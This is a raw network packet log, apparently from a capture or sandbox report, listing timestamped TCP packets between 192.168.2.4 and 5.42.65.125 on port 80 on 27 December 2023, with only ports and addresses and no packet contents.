Dec 27, 2023 18:12:25.132349014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132376909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132544994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132558107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132569075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132580996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132596016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132616997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.132631063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132643938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.132678986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133600950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133615017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133650064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133667946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133680105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133691072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133702993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133719921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133725882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133737087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133797884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133810043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133821964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133836031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133846998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133847952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133860111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.133873940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.133892059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134094954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134133101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134145975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134166956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134176016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134187937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134186983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134215117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134313107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134325981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134336948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134349108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134361982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134366989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134375095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134387016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134391069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134399891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.134412050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.134443998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135103941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135118008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135129929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135142088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135149002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135179996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135189056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135201931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135212898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135225058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135231018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135236979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135250092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135253906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135262012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135291100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135845900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135878086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135894060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135905981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135917902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.135951042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.135976076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136009932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136029005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136042118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136121035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136133909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136156082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136161089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136173010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136183977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136184931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136197090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136203051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136230946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136831999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136883974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136897087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136909008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136918068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136921883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136934042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136954069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136974096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136979103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.136986971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.136998892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137011051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137021065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137022972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137036085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137048960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137048960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137084007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137824059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137855053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137866974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137888908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137902975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137913942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137926102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137937069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137949944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137955904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.137962103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137975931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.137984037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.138015985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.138026953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138039112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138050079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138062000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138082027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.138108015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.138866901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138880968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138907909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138915062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.138920069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138932943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.138957977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139075041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139086962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139098883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139108896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139111042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139122963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139133930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139134884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139158010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139599085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139633894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139659882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139741898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139755011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139766932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139786959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139795065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139807940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139815092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139833927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139846087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139846087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139877081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.139879942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139913082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139925003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.139956951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140017986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140052080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140618086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140631914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140646935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140659094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140667915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140680075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140692949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140695095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140743971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140753984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140765905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140778065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140789032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140800953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140829086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.140842915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140855074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.140891075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.141971111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.141983986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.141994953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142005920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142016888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142024994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142029047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142040968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142046928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142052889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142066002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142076969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142088890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142091990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142102003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142107964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142113924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142124891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142152071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142539978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142605066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142621040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142632008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142643929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142656088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142663002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142680883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142697096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142715931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142728090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142755985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142769098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142790079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.142800093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.142813921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143336058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143373013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143408060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143493891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143506050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143517971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143529892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143538952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143542051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143563032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143568039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143575907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143585920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143610001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.143613100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143625021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143646955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143659115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.143666029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144254923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144268036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144279957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144295931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144320965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144325972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144334078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144355059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144357920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144390106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144411087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144423008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144433975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144453049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144476891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144489050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144500017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144517899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.144546986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.144551039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145277023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145289898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145325899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145329952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145342112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145365000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145365953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145376921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145395994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145400047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145433903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145442963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145456076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145467043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145487070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145505905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145519018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145539045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.145540953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.145574093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.146256924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146270037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146281958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146294117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146306038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146315098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.146339893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146347046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.146353006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146375895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.146387100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146409988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146418095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.146421909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146434069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.146466017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147053957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147066116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147078037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147099972 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147125006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147200108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147212029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147222996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147236109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147245884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147260904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147274017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147274017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147286892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147298098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147309065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147315979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147320032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.147345066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.147367001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148071051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148082018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148092985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148109913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148117065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148121119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148148060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148199081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148210049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148221016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148231983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148236036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148245096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148256063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148257017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148268938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148281097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.148284912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.148308039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149044037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149056911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149068117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149080038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149091959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149091959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149113894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149123907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149126053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149166107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.149171114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.149178028 CET	80	49738	5.42.65.125	192.168.2.4
